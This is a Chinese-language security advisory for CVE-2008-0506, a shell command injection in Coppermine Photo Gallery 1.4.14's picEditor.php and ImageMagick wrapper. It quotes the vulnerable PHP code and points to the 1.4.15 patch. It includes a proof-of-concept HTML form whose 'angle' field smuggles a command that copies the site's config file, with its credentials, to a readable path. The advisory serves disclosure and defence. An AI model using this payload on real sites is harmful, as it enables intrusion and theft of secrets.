发布日期：2008-01-29
更新日期：2008-01-31

受影响系统：

Coppermine Photo Gallery 1.4.14

不受影响系统：

Coppermine Photo Gallery 1.4.15

描述：

---

BUGTRAQ  ID: 27512
CVE ID: CVE-2008-0506

Coppermine是用PHP编写的多用途集成web图形库脚本。

Coppermine在处理用户请求时存在输入验证漏洞，远程攻击者可能利用此漏洞在用户系统上执行任意命令。

Coppermine的include/imageObjectIM.class.php文件中没有正确地验证用户所提交的quality、angle和clipval POST变量。在ImageMagick的包装函数中：

--------------------------------------
function rotateImage(&$angle){
...
    $imgFile = escapeshellarg("$this->directory$this->filename");
...
    $cmd = "{$CONFIG['impath']}convert -quality {$this->quality}
{$CONFIG['im_options']} -rotate $angle $imgFile $imgFile";
    exec ($cmd, $output, $retval);
-------------------------------------

可见未经过滤便在命令行中使用了$angle变量。在picEditor.php文件的123行：

-------------------------------------
...
   $newimage = $_POST['newimage'];
...
   if ($newimage){
      $imgObj = new imageObject($img_dir,$newimage);
...
      if ($imgObj->imgRes){
...
          if ($_POST['angle']<>0){
                  $imgObj = $imgObj->rotateImage($_POST['angle']);
          }
-------------------------------------

因此如果提交了正确的$_POST['newimage']和$_POST['angle']，就会导致注入shell命令。

<*来源：Janek Vind （come2waraxe@yahoo.com）
  
  链接：http://secunia.com/advisories/28682/
        http://marc.info/?l=bugtraq&m=120171066907290&w=2
        http://coppermine-gallery.net/forum/index.php?PHPSESSID=103feaebc400347873cbaecf8474835d&action=printpage;topic=50103.0
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html><body><center>
<form action="http://victim.com/cpg1414/picEditor.php" method="post">
<input type="hidden" name="newimage" value="../../images/thumb_zip.jpg">
<input type="hidden" name="quality" value="50">
<input type="hidden"
name="angle" value="180;cp include/config.inc.php include/secret.txt;">
<input type="submit" value="Test!">
</form>
</center></body></html>

建议：

---

厂商补丁：

Coppermine
----------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://downloads.sourceforge.net/coppermine/cpg1.4.15.zip

浏览次数：5746
严重程度：0（网友投票）